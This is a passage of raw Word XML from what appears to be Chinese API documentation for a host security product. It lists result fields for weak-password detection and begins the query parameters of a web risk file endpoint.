              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10A3F249" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C928779" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>弱密码类型（1/2/3/4 1-空密码； 2-默认弱密码；3-跟用户名相同；4-常见弱密码）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1590A015" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A0E50AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2239D7D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20190DAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C2E416B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用版本号（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28D19773" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="685A02FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>binPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6031C168" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FD5ABA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73268BE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用路径（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1D5444FC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BABE6BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CBF4024" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="300C855D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B6503EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C88EA4E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44E73FB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>unChangePwdDays</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7683B328" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="357CEC69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14863AC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码未修改天数（仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2FA56A2D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B91BDA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accountLoginType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="112496BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43B7B4EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79A45031" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ssh账号登录方式：0-不可登录；1-key登录；2-pwd登录；3-key&amp;pwd登录（仅linux， ssh）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73B141DE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77E71C48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>interactiveLoginType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7834F17C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="222121A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C14C407" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ssh账号交互登录方：0/1/2 0-不可登录；1-不可交互登录；2-可交互登录（仅linux， ssh）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="61A57E68" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7238CF44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pwdStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08745A05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72AE1E19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CC58C56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码状态：1/2/3/4 1-正常；2-将要失效；3-已经失效；4-已锁定（仅linux， ssh）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13270EC2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24EF3A58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>firstCheckTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="089DFE4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303118D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66923C7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>第一次发现该弱密码的时间(仅linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7DF11D35" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C6DD44F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bindIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C76BE80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7277329A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61DD32C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>绑定ip(仅linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4957C5CA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25FA6734" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1255ED91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05878595" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B1C578E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>绑定端口(仅linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4AFA1D38" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="474BC31B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4088ABCA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56333B13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="066E27D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程id(仅linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="178BEA34" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="783FD232" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="436FB4BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F7571C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="479AC532" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否root权限运行, true/false 是/否(仅linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7D57FF52" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DA49AF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ED9D9E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="668993F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46FD454A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否对外访问,true/false 是/否(仅linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="27A7ACAD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33EAEC05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="566D3FC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38348578" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51F10DB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>shell登录性：0/1 0-非登录shell；1-登录shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66982D1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="web风险文件"/>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="105"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Web风险文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770750DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供web风险文件检测和查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB5B88C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="web风险文件查询结果"/>
      <w:r>
        <w:t>web风险文件查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C75CEB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供web风险文件数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E88260F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2828F6A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/websecurity/weakfile/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468B190B"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608"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3669"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="04CD9E2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14C938F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51C5C99D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BD45EC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D440056" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72FB7D15" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F3875B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1408AE85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1BF145" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4703AC72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29222FEA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34FA8F82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B6031E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0466AC22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71E63F95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="43E5BAF5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F94F65B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30BBCC70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F9EB430" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7673648F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="316F1776" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F423054" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>filePath</w:t>
            </w:r>
          </w:p>
